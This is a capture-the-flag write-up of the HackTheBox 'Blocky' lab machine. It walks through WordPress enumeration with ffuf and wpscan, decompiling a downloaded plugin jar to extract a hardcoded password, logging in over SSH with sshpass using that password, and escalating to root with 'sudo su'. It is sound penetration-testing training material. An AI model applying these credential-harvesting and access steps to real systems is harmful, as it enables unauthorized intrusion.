Post

HackTheBox - Blocky

Posted Updated
Preview Image
By 0xyf
tcp/80-http/cms/wordpress
4 min read
HackTheBox - Blocky

Overview

This machine begins w/ a web enumeration, discovering a directory /plugins and wordpress CMS running on it. After enumerating wordpress, user notch is discovered. The /plugins directory contains 2 java archives. After extracting it, a compiled java file is found, simply decompiling it reveals SSH password for user notch.

For the privilege escalation part, user notch is able to run any command as root, running su privilege escalated us to root.

ColumnDetails
Box NameBlocky
IP10.10.10.37
Points20
DifficultyEasy
CreatorArrexel
Release Date21 Jul 2017

Recon

TCP/80 (HTTP)

  • FFUF
    1
2
3
4
5
6
7
8
9
10
11

      .htaccess               [Status: 403, Size: 294, Words: 22, Lines: 12, Duration: 3695ms]
  index.php               [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 70ms]
  javascript              [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 35ms]
  phpmyadmin              [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 35ms]
  plugins                 [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 35ms]
  server-status           [Status: 403, Size: 298, Words: 22, Lines: 12, Duration: 37ms]
  wiki                    [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 37ms]
  wp-admin                [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 36ms]
  wp-includes             [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 36ms]
  wp-content              [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 37ms]
  xmlrpc.php              [Status: 405, Size: 42, Words: 6, Lines: 1, Duration: 158ms]
    • plugins
    • phpmyadmin

Initial Foothold

TCP/80 (HTTP) - Enumerate WP

  1. Enumerate users
    1
2
3
4
5
6
7
8
9
10
11
12

     โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/blocky]
 โ””โ”€# wpscan --no-update --disable-tls-checks --url http://blocky.htb -e u -f cli-no-color 2>&1 | tee "tcp_80_http_wpscan_user_enum.txt"
	
 [i] User(s) Identified:
	
 [+] notch
  | Found By: Author Posts - Author Pattern (Passive Detection)
  | Confirmed By:
  |  Wp Json Api (Aggressive Detection)
  |   - http://blocky.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
  |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  |  Login Error Messages (Aggressive Detection)
    • notch
  2. Enumerate plugins
    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

     โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/blocky]
 โ””โ”€# wpscan --no-update --disable-tls-checks --plugins-detection aggressive --plugins-version-detection aggressive --url http://blocky.htb -e ap -f cli-no-color 2>&1 | tee "tcp_80_http_wpscan_plugin_enum.txt"
	
 [i] Plugin(s) Identified:
	
 [+] akismet
  | Location: http://blocky.htb/wp-content/plugins/akismet/
  | Last Updated: 2021-10-01T18:28:00.000Z
  | Readme: http://blocky.htb/wp-content/plugins/akismet/readme.txt
  | [!] The version is out of date, the latest version is 4.2.1
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://blocky.htb/wp-content/plugins/akismet/, status: 200
  |
  | Version: 3.3.2 (100% confidence)
  | Found By: Readme - Stable Tag (Aggressive Detection)
  |  - http://blocky.htb/wp-content/plugins/akismet/readme.txt
  | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
  |  - http://blocky.htb/wp-content/plugins/akismet/readme.txt
  3. Does not look vulnerable, move on

TCP/80 (HTTP) - What kind of files are in /plugins directory

  1. Download all files residing in plugins
  2. Determine the file type of downloaded files
    1
2
3
4
5

     โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/blocky/10.10.10.37/loot]
 โ””โ”€# file BlockyCore.jar griefprevention-1.11.2-3.1.1.298.jar 
 BlockyCore.jar:                       Java archive data (JAR)
	
 griefprevention-1.11.2-3.1.1.298.jar: Zip archive data, at least v2.0 to extract, compression method=deflate
  3. Extract BlockyCore.jar
    1
2
3

     โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/blocky/10.10.10.37/loot/blockycore]
 โ””โ”€# jar -xf BlockyCore.jar 
 Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
  4. View directory structure of the extract files
    1
2
3
4
5
6
7
8
9
10
11

     โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/blocky/10.10.10.37/loot/blockycore]
 โ””โ”€# tree -a .
 .
 โ”œโ”€โ”€ BlockyCore.jar
 โ”œโ”€โ”€ com
 โ”‚ย ย  โ””โ”€โ”€ myfirstplugin
 โ”‚ย ย      โ””โ”€โ”€ BlockyCore.class
 โ””โ”€โ”€ META-INF
     โ””โ”€โ”€ MANIFEST.MF
	
 3 directories, 3 files
    • BlockyCore.jar
  5. Determine the file type of Blocky.jore
    1
2
3

     โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/blocky/10.10.10.37/loot/blockycore/com/myfirstplugin]
 โ””โ”€# file BlockyCore.class 
 BlockyCore.class: compiled Java class data, version 52.0 (Java 1.8)
    • A Java class file is created by a Java compiler fromย .javaย files

TCP/80 (HTTP) - Decompile .class file, obtaining credentials

  1. Decompile BlockyCore.class file
    1
2

     โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/blocky/10.10.10.37/loot/blockycore/com/myfirstplugin]
 โ””โ”€# javap -c BlockyCore.class | tee decompiled_BlockyCore.class
  2. View decompiled_BlockyCore.class, credentials found in the comments
    1
2
3
4
5
6
7
8
9
10
11
12

     โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/blocky/10.10.10.37/loot/blockycore/com/myfirstplugin]
 โ””โ”€# cat decompiled_BlockyCore.class | grep -P '//'
        1: invokespecial #12                 // Method java/lang/Object."<init>":()V
        5: ldc           #14                 // String localhost
        7: putfield      #16                 // Field sqlHost:Ljava/lang/String;
       11: ldc           #18                 // String root
       13: putfield      #20                 // Field sqlUser:Ljava/lang/String;
       17: ldc           #22                 // String 8YsqfCTnvxAUeduzjNSXe22
       19: putfield      #24                 // Field sqlPass:Ljava/lang/String;
        1: ldc           #33                 // String TODO get username
        3: ldc           #35                 // String Welcome to the BlockyCraft!!!!!!!
        5: invokevirtual #37                 // Method sendMessage:(Ljava/lang/String;Ljava/lang/String;)V
    • 8YsqfCTnvxAUeduzjNSXe22

TCP/22 (SSH)

  1. SSH w/ notch:8YsqfCTnvxAUeduzjNSXe22
    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

     โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/blocky/10.10.10.37/loot/blockycore/com/myfirstplugin]
 โ””โ”€# sshpass -p '8YsqfCTnvxAUeduzjNSXe22' ssh notch@blocky.htb
 Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
	
  * Documentation:  https://help.ubuntu.com
  * Management:     https://landscape.canonical.com
  * Support:        https://ubuntu.com/advantage
	
 7 packages can be updated.
 7 updates are security updates.
	
	
 Last login: Tue Sep 20 06:14:32 2022 from 10.10.14.14
 notch@Blocky:~$ id;whoami
 uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
 notch
 notch@Blocky:~$

Privilege Escalation

Root - Sudo

  1. Check notch sudo access
    1
2
3
4
5
6
7

     notch@Blocky:~$ sudo -l
 [sudo] password for notch: 
 Matching Defaults entries for notch on Blocky:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
	
 User notch may run the following commands on Blocky:
     (ALL : ALL) ALL
    • Able to run any command as root
  2. Obtain root w/ su
    1
2
3
4
5

     notch@Blocky:~$ sudo su
 root@Blocky:/home/notch# id;whoami
 uid=0(root) gid=0(root) groups=0(root)
 root
 root@Blocky:/home/notch#
HackTheBox, HackTheBox - Linux
tcp/80-http/cms/wordpress
This post is licensed under CC BY 4.0 by the author.